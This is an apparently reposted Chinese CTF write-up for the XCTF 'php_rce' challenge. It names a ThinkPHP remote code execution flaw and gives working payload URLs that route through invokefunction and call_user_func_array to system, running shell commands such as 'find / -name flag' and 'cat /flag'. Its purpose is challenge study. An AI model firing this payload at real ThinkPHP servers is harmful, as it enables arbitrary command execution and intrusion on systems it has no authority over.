當前位置：首頁 > 编程语言 > php >内容正文

php

XCTF-高手进阶区：php_rce

發布時間：2023/12/31 php 32 豆豆

生活随笔收集整理的這篇文章主要介紹了 XCTF-高手进阶区：php_rce 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

題目：

看到題目就知道是thinkphp的遠程執行漏洞
payload：
index.php默認的話可以不需要

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php代碼

注：代碼后面可不加分號
獲得flag：

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name flag index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

總結

以上是生活随笔為你收集整理的XCTF-高手进阶区：php_rce的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇：检查刀刃有没有附魔是什么意思
下一篇： XCTF-高手进阶区：Web_php_i